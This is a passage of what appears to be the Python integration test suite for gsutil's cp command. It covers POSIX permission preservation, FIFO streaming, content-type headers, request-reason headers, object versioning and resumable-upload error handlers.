listing = TailSet(tmpdir, cls.FlatListDir(tmpdir))
cls.assertEquals(
listing,
set([
'/obj1', '/obj2', '/obj3', '/obj4', '/obj5', '/obj6', '/obj7',
'/obj8', '/obj9', '/obj10'
]))
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj1'),
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj2'),
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj3'),
gid=primary_gid,
mode=0o440)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj4'),
gid=non_primary_gid,
mode=0o444)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj5'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj6'),
uid=USER_ID,
gid=primary_gid,
mode=0o420)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj7'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj8'),
uid=USER_ID,
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj9'),
uid=USER_ID,
gid=primary_gid,
mode=0o433)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj10'),
uid=USER_ID,
gid=non_primary_gid,
mode=0o442)
def TestCpMvPOSIXLocalToBucketNoErrors(cls, bucket_uri, is_cp=True):
"""Helper function for testing local to bucket POSIX preservation.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket to cp/mv to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.getgid()
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR, NA_ID)
gid = attrs_dict.get(GID_ATTR, NA_ID)
mode = attrs_dict.get(MODE_ATTR, NA_MODE)
if mode != NA_MODE:
ValidatePOSIXMode(int(mode, 8))
ValidateFilePermissionAccess(obj_name,
uid=uid,
gid=int(gid),
mode=int(mode))
fpath = cls.CreateTempFile(contents=b'foo', uid=uid, gid=gid, mode=mode)
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P', fpath,
suri(bucket_uri, obj_name)])
if uid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
UID_ATTR, str(uid))
if gid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
GID_ATTR, str(gid))
if mode != NA_MODE:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
MODE_ATTR, str(mode))
def _ReadContentsFromFifo(fifo_path, list_for_output):
with open(fifo_path, 'rb') as f:
list_for_output.append(f.read())
def _WriteContentsToFifo(contents, fifo_path):
with open(fifo_path, 'wb') as f:
f.write(contents)
class _JSONForceHTTPErrorCopyCallbackHandler(object):
"""Test callback handler that raises an arbitrary HTTP error exception."""
def __init__(self, startover_at_byte, http_error_num):
self._startover_at_byte = startover_at_byte
self._http_error_num = http_error_num
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Forcing HTTP error %s after byte %s. '
'%s/%s transferred.\r\n' %
(self._http_error_num, self._startover_at_byte,
MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise apitools_exceptions.HttpError({'status': self._http_error_num},
None, None)
class _XMLResumableUploadStartOverCopyCallbackHandler(object):
"""Test callback handler that raises start-over exception during upload."""
def __init__(self, startover_at_byte):
self._startover_at_byte = startover_at_byte
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise boto.exception.ResumableUploadException(
'Forcing upload start over', ResumableTransferDisposition.START_OVER)
class _DeleteBucketThenStartOverCopyCallbackHandler(object):
"""Test callback handler that deletes bucket then raises start-over."""
def __init__(self, startover_at_byte, bucket_uri):
self._startover_at_byte = startover_at_byte
self._bucket_uri = bucket_uri
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Deleting bucket (%s)' % (self._bucket_uri.bucket_name))
@Retry(StorageResponseError, tries=5, timeout_secs=1)
def DeleteBucket():
bucket_list = list(self._bucket_uri.list_bucket(all_versions=True))
for k in bucket_list:
self._bucket_uri.get_bucket().delete_key(k.name,
version_id=k.version_id)
self._bucket_uri.delete_bucket()
DeleteBucket()
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise ResumableUploadStartOverException('Artificially forcing start-over')
class _ResumableUploadRetryHandler(object):
"""Test callback handler for causing retries during a resumable transfer."""
def __init__(self,
retry_at_byte,
exception_to_raise,
exc_args,
num_retries=1):
self._retry_at_byte = retry_at_byte
self._exception_to_raise = exception_to_raise
self._exception_args = exc_args
self._num_retries = num_retries
self._retries_made = 0
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, unused_total_size):
"""Cause a single retry at the retry point."""
if (total_bytes_transferred >= self._retry_at_byte and
self._retries_made < self._num_retries):
self._retries_made += 1
raise self._exception_to_raise(*self._exception_args)
class TestCp(testcase.GsUtilIntegrationTestCase):
"""Integration tests for cp command."""
# For tests that artificially halt, we need to ensure at least one callback
# occurs.
halt_size = START_CALLBACK_PER_BYTES * 2
def _get_test_file(self, name):
contents = pkgutil.get_data('gslib', 'tests/test_data/%s' % name)
return self.CreateTempFile(file_name=name, contents=contents)
def _CpWithFifoViaGsUtilAndAppendOutputToList(self, src_path_tuple, dst_path,
list_for_return_value,
**kwargs):
arg_list = ['cp']
arg_list.extend(src_path_tuple)
arg_list.append(dst_path)
# Append stderr, stdout, or return status (if specified in kwargs) to the
# given list.
list_for_return_value.append(self.RunGsUtil(arg_list, **kwargs))
@SequentialAndParallelTransfer
def test_noclobber(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'bar')
@SequentialAndParallelTransfer
def test_noclobber_different_size(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'quux')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'quux')
def test_dest_bucket_not_exist(self):
fpath = self.CreateTempFile(contents=b'foo')
invalid_bucket_uri = ('%s://%s' %
(self.default_provider, self.nonexistent_bucket_name))
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil(['cp', fpath, invalid_bucket_uri],
expected_status=1,
return_stderr=True)
self.assertIn('does not exist', stderr)
_Check()
def test_copy_in_cloud_noclobber(self):
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
stderr = self.RunGsUtil(
['cp', suri(key_uri), suri(bucket2_uri)], return_stderr=True)
# Rewrite API may output an additional 'Copying' progress notification.
self.assertGreaterEqual(stderr.count('Copying'), 1)
self.assertLessEqual(stderr.count('Copying'), 2)
stderr = self.RunGsUtil(
['cp', '-n', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertIn(
'Skipping existing item: %s' % suri(bucket2_uri, key_uri.object_name),
stderr)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_local_file_to_fifo(self):
contents = b'bar'
fifo_path = self.CreateTempFifo()
file_path = self.CreateTempFile(contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((file_path,), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_one_object_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents = b'bar'
obj_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj_uri),), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_multiple_objects_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents1 = b'foo and bar'
contents2 = b'baz and qux'
obj1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents1)
obj2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents2)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj1_uri), suri(obj2_uri)), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn(contents1, list_for_output[0])
self.assertIn(contents2, list_for_output[0])
@SequentialAndParallelTransfer
def test_streaming(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-', '%s' % suri(bucket_uri, 'foo')],
stdin='bar',
return_stderr=True)
self.assertIn('Copying from <STDIN>', stderr)
key_uri = self.StorageUriCloneReplaceName(bucket_uri, 'foo')
self.assertEqual(key_uri.get_contents_as_string(), b'bar')
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_object(self):
bucket_uri = self.CreateBucket()
fifo_path = self.CreateTempFifo()
object_name = 'foo'
object_contents = b'bar'
list_for_output = []
# Start writer in the background, which won't finish until a corresponding
# read operation is performed on the fifo.
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(object_contents, fifo_path))
write_thread.start()
# The fifo requires both a pending read and write before either operation
# will complete. Regardless of which operation occurs first, the
# corresponding subsequent operation will unblock the first one.
# We run gsutil in a thread so that it can timeout rather than hang forever
# if the write thread fails.
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), suri(bucket_uri, object_name), list_for_output),
kwargs={'return_stderr': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn('Copying from named pipe', list_for_output[0])
key_uri = self.StorageUriCloneReplaceName(bucket_uri, object_name)
self.assertEqual(key_uri.get_contents_as_string(), object_contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_stdout(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(contents, fifo_path))
write_thread.start()
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), '-', list_for_output),
kwargs={'return_stdout': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip().encode('ascii'), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_stdout_to_fifo(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
list_for_gsutil_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=(('-',), fifo_path, list_for_gsutil_output),
kwargs={
'return_stderr': True,
'stdin': contents
})
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
def test_streaming_multiple_arguments(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(['cp', '-', '-', suri(bucket_uri)],
stdin='bar',
return_stderr=True,
expected_status=1)
self.assertIn('Multiple URL strings are not supported with streaming',
stderr)
# TODO: Implement a way to test both with and without using magic file.
@SequentialAndParallelTransfer
def test_detect_content_type(self):
"""Tests local detection of content type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(['cp', self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
if IS_WINDOWS:
self.assertTrue(
re.search(r'Content-Type:\s+audio/x-mpg', stdout) or
re.search(r'Content-Type:\s+audio/mpeg', stdout))
else:
self.assertRegex(stdout, r'Content-Type:\s+audio/mpeg')
_Check1()
self.RunGsUtil(['cp', self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
def test_content_type_override_default(self):
"""Tests overriding content type with the default value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check1()
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check2()
def test_content_type_override(self):
"""Tests overriding content type with a value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check2()
@unittest.skipIf(IS_WINDOWS, 'magicfile is not available on Windows.')
@SequentialAndParallelTransfer
def test_magicfile_override(self):
"""Tests content type override with magicfile value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil(['cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
use_magicfile = boto.config.getbool('GSUtil', 'use_magicfile', False)
content_type = ('text/plain'
if use_magicfile else 'application/octet-stream')
self.assertRegex(stdout, r'Content-Type:\s+%s' % content_type)
_Check1()
@SequentialAndParallelTransfer
def test_content_type_mismatches(self):
"""Tests overriding content type when it does not match the file type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
self.RunGsUtil(['-h', 'Content-Type:image/gif', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check3()
@SequentialAndParallelTransfer
def test_content_type_header_case_insensitive(self):
"""Tests that content type header is treated with case insensitivity."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil(['-h', 'content-Type:text/plain', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
self.assertNotRegex(stdout, r'image/gif')
_Check1()
self.RunGsUtil([
'-h', 'CONTENT-TYPE:image/gif', '-h', 'content-type:image/gif', 'cp',
fpath, dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertNotRegex(stdout, r'image/gif,\s*image/gif')
_Check2()
@SequentialAndParallelTransfer
def test_other_headers(self):
"""Tests that non-content-type headers are applied successfully on copy."""
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil([
'-h', 'Cache-Control:public,max-age=12', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta, 'cp', fpath, dst_uri
])
stdout = self.RunGsUtil(['ls', '-L', dst_uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
dst_uri2 = suri(bucket_uri, 'bar')
self.RunGsUtil(['cp', dst_uri, dst_uri2])
# Ensure metadata was preserved across copy.
stdout = self.RunGsUtil(['ls', '-L', dst_uri2], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
@SequentialAndParallelTransfer
def test_request_reason_header(self):
"""Test that x-goog-request-header can be set using the environment variable."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
# Ensure x-goog-request-header is set in cp command
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
# Ensure x-goog-request-header is set in ls command
stderr = self.RunGsUtil(['-D', 'ls', '-L', dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
@SequentialAndParallelTransfer
@SkipForXML('XML APIs use a different debug log format.')
def test_request_reason_header_persists_multiple_requests_json(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
# PUT follows GET request. Both need the request-reason header.
reason_regex = (r'Making http GET[\s\S]*'
r'x-goog-request-reason\': \'b/this_is_env_reason[\s\S]*'
r'send: (b\')?PUT[\s\S]*x-goog-request-reason:'
r' b/this_is_env_reason')
self.assertRegex(stderr, reason_regex)
@SequentialAndParallelTransfer
@SkipForJSON('JSON API uses a different debug log format.')
def test_request_reason_header_persists_multiple_requests_xml(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
reason_regex = (
r'Final headers: \{[\s\S]*\''
r'x-goog-request-reason\': \'b/this_is_env_reason\'[\s\S]*}')
# Pattern should match twice since two requests should have a reason header.
self.assertRegex(stderr, reason_regex + r'[\s\S]*' + reason_regex)
@SequentialAndParallelTransfer
def test_versioning(self):
"""Tests copy with versioning."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = urigen(k2_uri)
self.RunGsUtil(['cp', suri(k1_uri), suri(k2_uri)])
k2_uri = self.StorageUriCloneReplaceName(bucket_uri, k2_uri.object_name)
k2_uri = self.StorageUriCloneReplaceKey(bucket_uri, k2_uri.get_key())
g2 = urigen(k2_uri)
self.StorageUriSetContentsFromString(k2_uri, 'data3')
g3 = urigen(k2_uri)
fpath = self.CreateTempFile()
# Check to make sure current version is data3.
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Check contents of all three versions
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g1), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g2), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data2')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g3), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Copy first version to current and verify.
self.RunGsUtil(
['cp',
'%s#%s' % (k2_uri.versionless_uri, g1), k2_uri.versionless_uri])
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
# Attempt to specify a version-specific URI for destination.
stderr = self.RunGsUtil(['cp', fpath, k2_uri.uri],
return_stderr=True,
expected_status=1)
self.assertIn('cannot be the destination for gsutil cp', stderr)
def test_versioning_no_parallelism(self):
"""Tests that copy all-versions errors when parallelism is enabled."""
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil([
'-m', 'cp', '-A',
suri(self.nonexistent_bucket_name, 'foo'),
suri(self.nonexistent_bucket_name, 'bar')
],
expected_status=1,
return_stderr=True)
self.assertIn('-m option is not supported with the cp -A flag', stderr)
_Check()
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_recursive_copying_versioned_bucket(self):
"""Tests cp -R with versioned buckets."""
bucket1_uri = self.CreateVersionedBucket()
bucket2_uri = self.CreateVersionedBucket()
bucket3_uri = self.CreateVersionedBucket()
# Write two versions of an object to the bucket1.
v1_uri = self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'data0')
self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'longer_data1',
gs_idempotent_generation=urigen(v1_uri))
self.AssertNObjectsInBucket(bucket1_uri, 2, versioned=True)
self.AssertNObjectsInBucket(bucket2_uri, 0, versioned=True)
self.AssertNObjectsInBucket(bucket3_uri, 0, versioned=True)
# Recursively copy to second versioned bucket.
# -A flag should copy all versions in order.
self.RunGsUtil(
['cp', '-R', '-A',
suri(bucket1_uri, '*'),
suri(bucket2_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket2_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
self.assertEquals(len(listing2), 4)
# First object in each bucket should match in size and version-less name.
size1, _, uri_str1, _ = listing1[0].split()
self.assertEquals(size1, str(len('data0')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[0].split()
self.assertEquals(size2, str(len('data0')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
# Similarly for second object in each bucket.
size1, _, uri_str1, _ = listing1[1].split()
self.assertEquals(size1, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[1].split()
self.assertEquals(size2, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
_Check2()
# Recursively copy to second versioned bucket with no -A flag.
# This should copy only the live object.
self.RunGsUtil(['cp', '-R', suri(bucket1_uri, '*'), suri(bucket3_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket3_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
# 1 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing2), 3)
# Live (second) object in bucket 1 should match the single live object.
size1, _, uri_str1, _ = listing2[0].split()
self.assertEquals(size1, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
_Check3()
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_generation_zero_match(self):
"""Tests that cp handles an object-not-exists precondition header."""
bucket_uri = self.CreateBucket()
fpath1 = self.CreateTempFile(contents=b'data1')
# Match 0 means only write the object if it doesn't already exist.
gen_match_header = 'x-goog-if-generation-match:0'
# First copy should succeed.
# TODO: This can fail (rarely) if the server returns a 5xx but actually
# commits the bytes. If we add restarts on small uploads, handle this
# case.
